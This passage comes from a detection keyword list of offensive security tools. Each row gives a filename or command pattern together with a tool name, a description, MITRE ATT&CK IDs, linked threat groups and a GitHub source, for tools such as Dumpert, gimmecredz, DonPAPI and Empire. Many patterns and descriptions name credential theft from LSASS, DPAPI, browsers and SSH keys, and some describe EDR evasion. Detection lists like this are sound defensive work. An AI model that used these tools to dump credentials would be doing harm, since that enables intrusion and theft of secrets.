TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*dtd-finder*,offensive_tool_keyword,dtd-finder,Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.,T1221 - T1228 - T1547,TA0005 - ,N/A,N/A,Exploitation tools,https://github.com/GoSecure/dtd-finder,1,0,N/A,N/A,6,551,100,2021-09-22T17:54:08Z,2019-07-15T20:13:54Z -*dtmsecurity/bof_helper*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) Creation Helper,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dtmsecurity/bof_helper,1,1,N/A,10,10,198,44,2022-05-03T18:56:14Z,2020-07-01T14:50:29Z -*dubmoat*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense 
Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*Dubmoat_ExtractData*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*Dubmoat_PrintFilename*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*Dubmoat_TruncateFile*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*DueDLLigence.cs*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*DueDLLigence.sln*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*DueDLLigence-master*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses 
and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,1,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*dump_chrome_user*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_CREDENTIAL_MSOFFICE*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_CREDENTIAL_TASKSCHEDULER*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_CREDENTIAL_TSE*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_domain*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*dump_firefox_user*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_jenkins*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_keepassx*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_lsass*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*dump_lsass.js*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*dump_process(*lsass.exe*)*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*dump_sam(*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*dump_secrets.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*dump_ssh_keys*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_tomcat*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_VAULT_INTERNET_EXPLORER*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_VAULT_NGC_LOCAL_ACCOOUNT*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_VAULT_WIN_BIO_KEY*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dump_webconf*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_webpass*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_wifi_wpa_*,offensive_tool_keyword,gimmecredz,This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on,T1003 - T1081 - T1552,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/0xmitsurugi/gimmecredz,1,1,N/A,N/A,2,166,25,2020-01-25T21:56:20Z,2018-09-25T15:46:50Z -*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dump_WPA-PMKID-PBKDF2.hashcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*DumpBrowserHistory*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*dumpcap -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*DumpCreds*,offensive_tool_keyword,DumpCreds,Dumpcreds is a tool that may be used to extract various credentials from running processes. 
I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit,T1055 - T1003 - T1216 - T1002 - T1552,TA0002 - TA0003 - TA0008 - TA0006,N/A,N/A,Credential Access,https://github.com/ponypot/dumpcreds,1,1,N/A,N/A,1,4,1,2019-10-08T07:26:31Z,2017-10-10T12:57:42Z -*-DumpCreds*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 script argument,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*dumpCredStore.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Dumpert*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,0,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.bin*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*dumpert.dmp*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.exe*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.exe*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert.git*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*dumpert.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*dumpert_path=*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*Dumpert-Aggressor*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,1,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*Dumpert-Aggressor*,offensive_tool_keyword,Dumpert,Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*dumpertdll*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*Dumpert-DLL*,offensive_tool_keyword,Dumpert,Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.,T1003 - T1055 - T1083 - T1059 - T1204,TA0003 - TA0005 - TA0002,N/A,N/A,Credential Access,https://github.com/outflanknl/Dumpert,1,1,N/A,N/A,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*-DumpForest *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*dumplsass*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*dumpntlm.py*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*DumpNTLMInfo.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*DumpProcessByName*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 